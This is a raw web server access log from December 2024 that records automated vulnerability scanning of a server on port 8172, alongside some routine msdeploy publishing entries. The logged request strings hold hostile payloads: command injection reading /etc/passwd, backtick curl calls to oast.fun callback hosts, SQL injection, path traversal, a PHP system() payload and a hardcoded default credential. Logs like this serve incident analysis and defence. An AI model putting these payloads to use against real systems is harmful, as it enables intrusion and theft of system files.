07:29:12 103.153.214.94 GET /include/exportUser.php type=3&cla=application&func=_exec&opt=(cat%20/etc/passwd)%3Eatak.txt 8172 - 156.251.25.152 Mozilla/5.0+(Debian;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/128.0.0.0+Safari/537.36 - 404 7 0 212 2024-12-12 07:29:16 103.153.214.94 GET /include/atak.txt - 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_6)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/15.6.1+Safari/605.1.15 - 404 7 0 201 2024-12-12 07:29:18 103.153.214.94 GET /api/experimental/test - 8172 - 156.251.25.152 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64;+rv:103.0)+Gecko/20100101+Firefox/103.0 - 404 7 0 201 2024-12-12 07:29:23 103.153.214.94 GET /api/experimental/dags/example_trigger_target_dag/paused/false - 8172 - 156.251.25.152 Mozilla/5.0+(Knoppix;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/126.0.0.0+Safari/537.36 - 404 7 0 206 2024-12-12 07:29:26 103.153.214.94 POST /api/experimental/dags/example_trigger_target_dag/dag_runs - 8172 - 156.251.25.152 Mozilla/5.0+(SS;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/118.0.0.0+Safari/537.36 - 404 7 0 201 2024-12-12 07:29:33 103.153.214.94 POST /ajax/render/widget_tabbedcontainer_tab_panel - 8172 - 156.251.25.152 Mozilla/5.0+(Ubuntu;+Linux+x86_64;+rv:126.0)+Gecko/20100101+Firefox/126.0 - 404 7 0 226 2024-12-12 07:29:45 103.153.214.94 GET /webui - 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.4.1+Safari/605.1.35 - 404 7 0 38 2024-12-12 07:29:52 103.153.214.94 POST /webui/logoutconfirm.html logon_hash=1 8172 - 206.238.196.225 Mozilla/5.0+(Knoppix;+Linux+i686;+rv:127.0)+Gecko/20100101+Firefox/127.0 - 404 7 0 54 2024-12-12 07:32:50 103.153.214.94 POST /cgi-bin/login.cgi - 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.5+Safari/605.1.63 https://bcvt.kontum.gov.vn:8172 404 7 0 212 2024-12-12 07:32:56 103.153.214.94 POST /cgi-bin/system_log.cgi - 8172 - 156.251.25.152 Mozilla/5.0+(Windows+NT+6.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2228.0+Safari/537.36 - 404 7 0 203 2024-12-12 07:32:57 103.153.214.94 POST /lib/crud/userprocess.php - 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.4.1+Safari/605.2.23 - 404 7 0 224 2024-12-12 07:33:02 103.153.214.94 GET /login.php - 8172 - 156.251.25.152 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64;+rv:124.0)+Gecko/20100101+Firefox/124.0 - 404 7 0 214 2024-12-12 07:33:05 103.153.214.94 POST /lib/crud/userprocess.php - 8172 - 156.251.25.152 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/98.0.4758.102+Safari/537.36 - 404 7 0 228 2024-12-12 07:33:13 103.153.214.94 GET /wp-content/plugins/import-xml-feed/readme.txt - 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/16.6+Safari/605.1.15 - 404 7 0 233 2024-12-12 07:33:13 103.153.214.94 POST /login - 8172 - 156.251.25.152 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64;+rv:92.0)+Gecko/20100101+Firefox/92.0 bcvt.kontum.gov.vn:8172/module/login/login.html 404 7 0 206 2024-12-12 07:33:15 103.153.214.94 HEAD /msdeploy.axd site=kiemkegpmb.gdtsolutions.vn 8172 - 116.96.77.140 - - 401 2 5 23 2024-12-12 07:33:15 103.153.214.94 HEAD /msdeploy.axd site=kiemkegpmb.gdtsolutions.vn 8172 kiemke 116.96.77.140 - - 200 0 0 41 2024-12-12 07:33:15 103.153.214.94 HEAD /msdeploy.axd site=kiemkegpmb.gdtsolutions.vn 8172 kiemke 116.96.77.140 - - 200 0 0 27 2024-12-12 07:33:15 103.153.214.94 POST /msdeploy.axd site=kiemkegpmb.gdtsolutions.vn 8172 kiemke 116.96.77.140 VS17.0:PublishDialog:WTE17.11.231.19466;sid=bf1d1153-9e09-4cd6-9710-3c1aa643c03a;op=Sync - 200 0 0 343 2024-12-12 07:33:15 103.153.214.94 POST /msdeploy.axd site=kiemkegpmb.gdtsolutions.vn 8172 kiemke 116.96.77.140 - - 200 0 0 473 2024-12-12 07:33:25 103.153.214.94 HEAD /msdeploy.axd site=kiemkegpmb.gdtsolutions.vn 8172 kiemke 116.96.77.140 - - 200 0 0 26 2024-12-12 07:33:25 103.153.214.94 HEAD /msdeploy.axd site=kiemkegpmb.gdtsolutions.vn 8172 kiemke 116.96.77.140 - - 200 0 0 25 2024-12-12 07:33:26 103.153.214.94 POST /msdeploy.axd site=kiemkegpmb.gdtsolutions.vn 8172 kiemke 116.96.77.140 - - 200 0 0 1112 2024-12-12 07:33:26 103.153.214.94 POST /msdeploy.axd site=kiemkegpmb.gdtsolutions.vn 8172 kiemke 116.96.77.140 VS17.0:PublishDialog:WTE17.11.231.19466;sid=c9f05481-6de2-46b9-a9a4-0b0b64691210;op=Sync - 200 0 0 1002 2024-12-12 07:33:26 103.153.214.94 HEAD /msdeploy.axd site=kiemkegpmb.gdtsolutions.vn 8172 kiemke 116.96.77.140 - - 200 0 0 28 2024-12-12 07:33:28 103.153.214.94 POST /msdeploy.axd site=kiemkegpmb.gdtsolutions.vn 8172 kiemke 116.96.77.140 VS17.0:PublishDialog:WTE17.11.231.19466;sid=c9f05481-6de2-46b9-a9a4-0b0b64691210;op=Sync - 200 0 0 1146 2024-12-12 07:33:28 103.153.214.94 POST /msdeploy.axd site=kiemkegpmb.gdtsolutions.vn 8172 kiemke 116.96.77.140 - - 200 0 0 1264 2024-12-12 07:33:46 103.153.214.94 POST /index.php option=comgmapfp&controller=editlieux&tmpl=component&task=upload_image 8172 - 156.251.25.152 Mozilla/5.0+(CentOS;+Linux+i686;+rv:123.0)+Gecko/20100101+Firefox/123.0 https://bcvt.kontum.gov.vn:8172 404 7 0 205 2024-12-12 07:33:46 103.153.214.94 POST /index.php option=com_gmapfp&controller=editlieux&tmpl=component&task=upload_image 8172 - 156.251.25.152 Mozilla/5.0+(Debian;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/122.0.0.0+Safari/537.36 https://bcvt.kontum.gov.vn:8172 404 7 0 211 2024-12-12 07:35:55 103.153.214.94 POST /carbon/generic/save_artifact_ajaxprocessor.jsp - 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/115.0.0.0+Safari/537.36 - 404 7 0 206 2024-12-12 07:36:37 103.153.214.94 POST /jars/upload - 8172 - 156.251.25.152 Mozilla/5.0+(Ubuntu;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/118.0.0.0+Safari/537.36 - 404 7 0 221 2024-12-12 07:36:37 103.153.214.94 GET /fw.login.php apikey=%27UNION%20select%201,%27YToyOntzOjM6InVpZCI7czo0OiItMTAwIjtzOjIyOiJBQ1RJVkVfRElSRUNUT1JZX0lOREVYIjtzOjE6IjEiO30=%27; 8172 - 156.251.25.152 Mozilla/5.0+(Fedora;+Linux+i686;+rv:125.0)+Gecko/20100101+Firefox/125.0 - 404 7 0 219 2024-12-12 07:36:40 103.153.214.94 GET /cyrus.index.php service-cmds-peform=%7C%7Cwhoami%7C%7C 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10.15;+rv:109.0)+Gecko/20100101+Firefox/118.0 - 404 7 0 214 2024-12-12 07:36:40 103.153.214.94 GET /jobmanager/logs/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2ftmp%2fpoc - 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+17_4_1)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.0+Safari/605.1.15 - 400 0 0 239 2024-12-12 07:37:55 103.153.214.94 POST /j_security_check - 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.5+Safari/605.1.18 https://bcvt.kontum.gov.vn:8172 404 7 0 57 2024-12-12 07:38:14 103.153.214.94 GET /admin/ - 8172 - 156.251.25.152 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64;+rv:87.0)+Gecko/20100101+Firefox/87.0 - 404 7 0 216 2024-12-12 07:38:17 103.153.214.94 GET /admin/ - 8172 - 156.251.25.152 Mozilla/5.0+(SS;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/124.0.0.0+Safari/537.36 - 404 7 0 205 2024-12-12 07:38:52 103.153.214.94 POST /orion/login siteurl=meet 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/15.4+Safari/605.1.15 https://bcvt.kontum.gov.vn:8172/orion/login?siteurl=meet&rnd=0.1359184728177283 404 7 0 60 2024-12-12 07:39:43 103.153.214.94 GET /tplus/ajaxpro/RecoverPassword,App_Web_recoverpassword.aspx.cdcab7d2.ashx method=MEqe8U 8172 - 206.238.196.225 Mozilla/5.0+(Debian;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/118.0.0.0+Safari/537.36 - 404 7 0 44 2024-12-12 07:39:49 103.153.214.94 POST /emap/webservice/gis/soap/bitmap - 8172 - 206.238.196.225 Mozilla/5.0+(SS;+Linux+x86_64;+rv:122.0)+Gecko/20100101+Firefox/122.0 - 404 7 0 34 2024-12-12 07:39:49 103.153.214.94 GET /tplus/ajaxpro/RecoverPassword,App_Web_recoverpassword.aspx.cdcab7d2.ashx method=SetNewPwd 8172 - 206.238.196.225 Mozilla/5.0+(CentOS;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/124.0.0.0+Safari/537.36 - 404 7 0 33 2024-12-12 07:40:25 103.153.214.94 GET / p=1 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+13_5_3;+en-US)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.1.4+Safari/605.1.15 - 404 7 0 203 2024-12-12 07:40:55 103.153.214.94 POST /var - 8172 - 156.251.25.152 Mozilla/5.0+(Knoppix;+Linux+x86_64;+rv:128.0)+Gecko/20100101+Firefox/128.0 https://bcvt.kontum.gov.vn:8172 404 7 0 223 2024-12-12 07:41:02 103.153.214.94 POST /wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php - 8172 - 156.251.25.152 Mozilla/5.0+\(Windows+NT+10.0\;+Win64\;+x64\)+AppleWebKit/537.36+\(KHTML,+like+Gecko\)+Chrome/100.0.4896.60+Safari/537.36 - 404 7 0 221 2024-12-12 07:41:54 103.153.214.94 POST /evo-apigw/evo-oauth/oauth/token - 8172 - 206.238.196.225 Mozilla/5.0+(Windows+NT+6.1;+rv:109.0)+Gecko/20100101+Firefox/115.0 - 404 7 0 61 2024-12-12 07:42:52 103.153.214.94 POST /runners/start - 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.4.1+Safari/605.6.21 - 404 7 0 57 2024-12-12 07:42:54 103.153.214.94 POST /CardSolution/card/accessControl/swingCardRecord/deleteFtp - 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/109.0.0.0+Safari/537.36 - 404 7 0 33 2024-12-12 07:43:02 103.153.214.94 POST / - 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+12_1_3)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.3.5+Safari/605.1.15 - 404 7 0 222 2024-12-12 07:43:11 103.153.214.94 GET /cgi-bin/execute_cmd.cgi timestamp=1589333279490&cmd=cat%20/etc/passwd 8172 - 156.251.25.152 Mozilla/5.0+(Ubuntu;+Linux+x86_64;+rv:121.0)+Gecko/20100101+Firefox/121.0 - 404 7 0 219 2024-12-12 07:43:55 103.153.214.94 POST /CDGServer3/NetSecConfigAjax;Service - 8172 - 206.238.196.225 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64;+rv:100.0)+Gecko/20100101+Firefox/100.0 - 404 7 0 55 2024-12-12 07:43:57 103.153.214.94 GET /plus/flink.php dopost=save&c=cat%20/etc/passwd 8172 - 206.238.196.225 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/94.0.4606.81+Safari/537.36 <?php+"system"($c);die;/*ref 404 7 0 42 2024-12-12 07:44:12 103.153.214.94 POST / - 8172 - 156.251.25.152 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/95.0.4638.69+Safari/537.36 - 404 7 0 200 2024-12-12 07:44:25 103.153.214.94 GET /login.php - 8172 - 156.251.25.152 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64;+rv:105.0)+Gecko/20100101+Firefox/105.0 - 404 7 0 202 2024-12-12 07:45:02 103.153.214.94 GET /index.php fc=module&module=productcomments&controller=CommentGrade&id_products%5B%5D=(select*from(select(sleep(6)))a) 8172 - 156.251.25.152 Mozilla/5.0+(Windows+NT+6.1;+Win64;+x64;+rv:81.0)+Gecko/20100101+Firefox/81.0 - 404 7 0 228 2024-12-12 07:45:04 103.153.214.94 POST / - 8172 - 156.251.25.152 Mozilla/5.0+(X11;+Ubuntu;+Linux+x86_64;+rv:109.0)+Gecko/20100101+Firefox/111.0 - 404 7 0 219 2024-12-12 07:45:08 103.153.214.94 POST /CDGServer3/NoticeAjax;Service - 8172 - 206.238.196.225 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/39.0.2171.99+Safari/537.36 - 404 7 0 54 2024-12-12 07:46:58 103.153.214.94 POST /wp-admin/admin-ajax.php - 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/15.4+Safari/605.1.15 - 404 7 0 209 2024-12-12 07:47:00 103.153.214.94 POST /login.htm - 8172 - 156.251.25.152 Mozilla/5.0+(Fedora;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/123.0.0.0+Safari/537.36 - 404 7 0 217 2024-12-12 07:47:43 103.153.214.94 GET /setup.cgi todo=debug&x=currentsetting.htm 8172 - 156.251.25.152 Mozilla/5.0+(X11;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/124.0.0.0+Safari/537.36 - 404 7 0 224 2024-12-12 07:48:19 103.153.214.94 POST / - 8172 - 206.238.196.225 Mozilla/5.0+(Knoppix;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/122.0.0.0+Safari/537.36 - 404 7 0 32 2024-12-12 07:48:50 103.153.214.94 POST /cgi-bin/system_mgr.cgi - 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10.15;+rv:126.0)+Gecko/20100101+Firefox/126.0 - 404 7 0 244 2024-12-12 07:48:53 103.153.214.94 POST /cgi-bin/system_mgr.cgi C1=ON&cmd=cgi_ntp_time&f_ntp_server=`curl 8172 - 156.251.25.152 Mozilla/5.0+\(Windows+NT+10.0\;+Win64\;+x64\)+AppleWebKit/537.36+\(KHTML,+like+Gecko\)+Chrome/100.0.4896.60+Safari/537.36 - 404 7 0 242 2024-12-12 07:49:09 103.153.214.94 GET / - 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.4+Safari/17.4 - 404 7 0 202 2024-12-12 07:49:11 103.153.214.94 POST /checkValid - 8172 - 156.251.25.152 Mozilla/5.0+(X11;+CrOS+x86_64+14541.0.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/116.0.0.0+Safari/537.36 - 404 7 0 212 2024-12-12 07:49:14 103.153.214.94 GET /public/css/2q6JQcWbIOgzMY0l2RWKprsrFfz.css - 8172 - 156.251.25.152 Mozilla/5.0+(Kubuntu;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/118.0.0.0+Safari/537.36 - 404 7 0 225 2024-12-12 07:51:13 103.153.214.94 POST / - 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/119.0.0.0+Safari/537.36 - 404 7 0 34 2024-12-12 07:51:13 103.153.214.94 POST / - 8172 - 206.238.196.225 Mozilla/5.0+(Ubuntu;+Linux+i686;+rv:122.0)+Gecko/20100101+Firefox/122.0 - 404 7 0 38 2024-12-12 07:51:15 103.153.214.94 POST / - 8172 - 206.238.196.225 Mozilla/5.0+(ZZ;+Linux+x86_64;+rv:124.0)+Gecko/20100101+Firefox/124.0 - 404 7 0 31 2024-12-12 07:52:01 103.153.214.94 POST / - 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_5)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/64.0.3282.140+Safari/537.36 - 404 7 0 35 2024-12-12 07:54:13 103.153.214.94 POST / - 8172 - 206.238.196.225 Mozilla/5.0+(SS;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/122.0.0.0+Safari/537.36 - 404 7 0 36 2024-12-12 07:54:55 103.153.214.94 POST /goform/setSysAdm - 8172 - 156.251.25.152 Mozilla/5.0+(SS;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/118.0.0.0+Safari/537.36 https://bcvt.kontum.gov.vn:8172/login.shtml 404 7 0 201 2024-12-12 07:55:02 103.153.214.94 GET /include/makecvs.php Event=%60curl+http%3a//ctd67t3bclspkptm3qo0wrw7eah5p5sbd.oast.fun+-H+'User-Agent%3a+GSM4ff'%60 8172 - 156.251.25.152 Mozilla/5.0+(Knoppix;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/121.0.0.0+Safari/537.36 - 404 7 0 195 2024-12-12 07:55:05 103.153.214.94 GET /tos/index.php explorer/pathList&path=%60curl+http%3a//ctd67t3bclspkptm3qo0m7so9q1keypbm.oast.fun+-H+'User-Agent%3a+GSM4ff'%60 8172 - 156.251.25.152 Mozilla/5.0+(Fedora;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/125.0.0.0+Safari/537.36 - 404 7 0 203 2024-12-12 07:56:08 103.153.214.94 POST /actions/authenticate.php - 8172 - 156.251.25.152 Mozilla/5.0+(ZZ;+Linux+x86_64;+rv:127.0)+Gecko/20100101+Firefox/127.0 - 404 7 0 229 2024-12-12 07:56:12 103.153.214.94 POST /assets/php/upload.php - 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+LoiLoNote/19.0.0+Version/17.1.2+Safari/605.1.15 http://bcvt.kontum.gov.vn:8172 404 7 0 202 2024-12-12 07:56:12 103.153.214.94 POST /convert - 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.5+Safari/605.6.18 - 404 7 0 200 2024-12-12 07:56:13 103.153.214.94 GET /assets/data/usrimg/2q6jqy7pjk9yton7zrch079tgaf.php - 8172 - 156.251.25.152 Mozilla/5.0+(Windows+NT+6.1;+rv:109.0)+Gecko/20100101+Firefox/115.0 - 404 7 0 196 2024-12-12 07:56:15 103.153.214.94 GET /file/8esLz2.txt - 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/16.5+Safari/605.1.15 - 404 7 0 204 2024-12-12 07:58:16 103.153.214.94 POST /auth/check - 8172 - 156.251.25.152 Mozilla/5.0+(X11;+Linux+x86_64;+rv:124.0)+Gecko/20100101+Firefox/124.0 - 404 7 0 213 2024-12-12 07:59:48 103.153.214.94 POST /auth/newpassword - 8172 - 156.251.25.152 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64;+rv:96.0)+Gecko/20100101+Firefox/96.0 - 404 7 0 205 2024-12-12 08:00:14 103.153.214.94 GET /ebook/bookPerPub.php pubid=4' 8172 - 156.251.25.152 Mozilla/5.0+(X11;+CrOS+x86_64+14541.0.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/124.0.0.0+Safari/537.36 - 404 7 0 217 2024-12-12 08:01:12 103.153.214.94 GET / username=zyfwp&password=PrOw!aN_fXp 8172 - 156.251.25.152 Mozilla/5.0+(Fedora;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/123.0.0.0+Safari/537.36 - 404 7 0 203 2024-12-12 08:01:15 103.153.214.94 GET /ext-js/index.html - 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.4.1+Safari/605.4.22 - 404 7 0 226 2024-12-12 08:01:17 103.153.214.94 POST /dfsms/ - 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh+Intel+Mac+OS+X+10.15+rv:91.0)+Gecko/20100101+Firefox/91.0; - 404 7 0 206 2024-12-12 08:01:20 103.153.214.94 GET /index.php/catalogsearch/advanced/result/ name=e 8172 - 156.251.25.152 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64;+rv:101.0)+Gecko/20100101+Firefox/101.0 - 404 7 0 219 2024-12-12 08:01:42 103.153.214.94 POST /incom/modules/uploader/showcase/script.php - 8172 - 156.251.25.152 Mozilla/5.0+(Windows+NT+10.0;+rv:125.0)+Gecko/20100101+Firefox/125.0 - 404 7 0 200 2024-12-12 08:01:49 103.153.214.94 GET /upload/userfiles/image/2q6JQgQss26W7jWmhsQhZ3gYDNO.png - 8172 - 156.251.25.152 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64;+rv:98.0)+Gecko/20100101+Firefox/98.0 - 404 7 0 198 2024-12-12 08:03:30 103.153.214.94 POST /EemAdminService/EemAdmin - 8172 - 156.251.25.152 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/125.0.0.0+Safari/537.36 - 404 7 0 428 2024-12-12 08:03:33 103.153.214.94 POST /CTCWebService/CTCWebServiceBean/ConfigServlet - 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.2+Safari/605.7.20 - 404 7 0 202 2024-12-12 08:05:40 103.153.214.94 POST /auth/requestreset - 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.4.1+Safari/605.1.79 - 404 7 0 201 2024-12-12 08:05:43 103.153.214.94 POST /auth/requestreset - 8172 - 156.251.25.152 Mozilla/5.0+(SS;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/121.0.0.0+Safari/537.36 - 404 7 0 203 2024-12-12 08:06:07 103.153.214.94 HEAD /msdeploy.axd Site=qnquyhoach.nextform.vn 8172 - 119.82.130.75 - - 401 2 5 12 2024-12-12 08:06:07 103.153.214.94 HEAD /msdeploy.axd Site=qnquyhoach.nextform.vn 8172 jenkins 119.82.130.75 - - 200 0 0 33 2024-12-12 08:06:07 103.153.214.94 HEAD /msdeploy.axd Site=qnquyhoach.nextform.vn 8172 jenkins 119.82.130.75 - - 200 0 0 20 2024-12-12 08:06:07 103.153.214.94 POST /msdeploy.axd Site=qnquyhoach.nextform.vn 8172 jenkins 119.82.130.75 MSDeployExe;sid=48cd7146-8293-4abd-b18f-da3f85142d0f;op=Sync - 200 0 0 261 2024-12-12 08:06:07 103.153.214.94 POST /msdeploy.axd Site=qnquyhoach.nextform.vn 8172 jenkins 119.82.130.75 - - 200 0 0 329 2024-12-12 08:06:07 103.153.214.94 HEAD /msdeploy.axd Site=qnquyhoach.nextform.vn 8172 jenkins 119.82.130.75 - - 200 0 0 8 2024-12-12 08:06:20 103.153.214.94 POST /msdeploy.axd Site=qnquyhoach.nextform.vn 8172 jenkins 119.82.130.75 MSDeployExe;sid=48cd7146-8293-4abd-b18f-da3f85142d0f;op=Sync - 200 0 0 12086 2024-12-12 08:06:20 103.153.214.94 POST /msdeploy.axd Site=qnquyhoach.nextform.vn 8172 jenkins 119.82.130.75 - - 200 0 0 12126 2024-12-12 08:06:46 103.153.214.94 POST /os/mxperson - 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.3.1+Safari/605.1.1+20.51 - 404 7 0 220 2024-12-12 08:06:49 103.153.214.94 POST /meaweb/os/mxperson - 8172 - 156.251.25.152 Mozilla/5.0+(Knoppix;+Linux+i686;+rv:121.0)+Gecko/20100101+Firefox/121.0 - 404 7 0 203 2024-12-12 08:08:04 103.153.214.94 GET /nuclei.svg sghzF=x 8172 - 206.238.196.225 - - 404 7 0 65 2024-12-12 08:08:04 103.153.214.94 GET /nuclei.svg sghzF=x 8172 - 206.238.196.225 - - 404 7 0 61 2024-12-12 08:08:04 103.153.214.94 GET /nuclei.svg sghzF=x 8172 - 206.238.196.225 - - 404 7 0 52 2024-12-12 08:08:04 103.153.214.94 GET /nuclei.svg sghzF=x 8172 - 206.238.196.225 - - 404 7 0 53 2024-12-12 08:08:04 103.153.214.94 GET /nuclei.svg sghzF=x 8172 - 206.238.196.225 - - 404 7 0 52 2024-12-12 08:08:04 103.153.214.94 GET /nuclei.svg sghzF=x 8172 - 206.238.196.225 - - 404 7 0 54 2024-12-12 08:08:04 103.153.214.94 GET /nuclei.svg sghzF=x 8172 - 206.238.196.225 - - 404 7 0 52 2024-12-12 08:08:04 103.153.214.94 GET /nuclei.svg sghzF=x 8172 - 206.238.196.225 - - 404 7 0 55 2024-12-12 08:08:04 103.153.214.94 GET /nuclei.svg sghzF=x 8172 - 206.238.196.225 - - 404 7 0 61 2024-12-12 08:08:04 103.153.214.94 GET /nuclei.svg sghzF=x 8172 - 206.238.196.225 - - 404 7 0 57 2024-12-12 08:08:04 103.153.214.94 GET /nuclei.svg sghzF=x 8172 - 206.238.196.225 - - 404 7 0 65 2024-12-12 08:08:04 103.153.214.94 GET /nuclei.svg sghzF=x 8172 - 206.238.196.225 - - 404 7 0 67 2024-12-12 08:08:22 103.153.214.94 GET /nuclei.svg sghzF=x 8172 - 206.238.196.225 - - 404 7 0 54 2024-12-12 08:08:22 103.153.214.94 GET /nuclei.svg sghzF=x 8172 - 206.238.196.225 - - 404 7 0 55 2024-12-12 08:08:22 103.153.214.94 GET /nuclei.svg sghzF=x 8172 - 206.238.196.225 - - 404 7 0 30 2024-12-12 08:08:22 103.153.214.94 GET /nuclei.svg sghzF=x 8172 - 206.238.196.225 - - 404 7 0 31 2024-12-12 08:08:22 103.153.214.94 GET /nuclei.svg sghzF=x 8172 - 206.238.196.225 - - 404 7 0 39 2024-12-12 08:08:22 103.153.214.94 GET /nuclei.svg sghzF=x 8172 - 206.238.196.225 - - 404 7 0 37 2024-12-12 08:08:22 103.153.214.94 GET /nuclei.svg sghzF=x 8172 - 206.238.196.225 - - 404 7 0 40 2024-12-12 08:08:22 103.153.214.94 GET /nuclei.svg sghzF=x 8172 - 206.238.196.225 - - 404 7 0 38 2024-12-12 08:08:22 103.153.214.94 GET /nuclei.svg sghzF=x 8172 - 206.238.196.225 - - 404 7 0 40 2024-12-12 08:08:22 103.153.214.94 GET /nuclei.svg sghzF=x 8172 - 206.238.196.225 - - 404 7 0 40 2024-12-12 08:08:22 103.153.214.94 GET /nuclei.svg sghzF=x 8172 - 206.238.196.225 - - 404 7 0 62 2024-12-12 08:08:22 103.153.214.94 GET /nuclei.svg sghzF=x 8172 - 206.238.196.225 - - 404 7 0 55 2024-12-12 08:08:22 103.153.214.94 GET /nuclei.svg sghzF=x 8172 - 206.238.196.225 - - 404 7 0 53 2024-12-12 08:08:41 103.153.214.94 GET /nuclei.svg sghzF=x 8172 - 206.238.196.225 - - 404 7 0 57 2024-12-12 08:08:41 103.153.214.94 GET /nuclei.svg sghzF=x 8172 - 206.238.196.225 - - 404 7 0 48 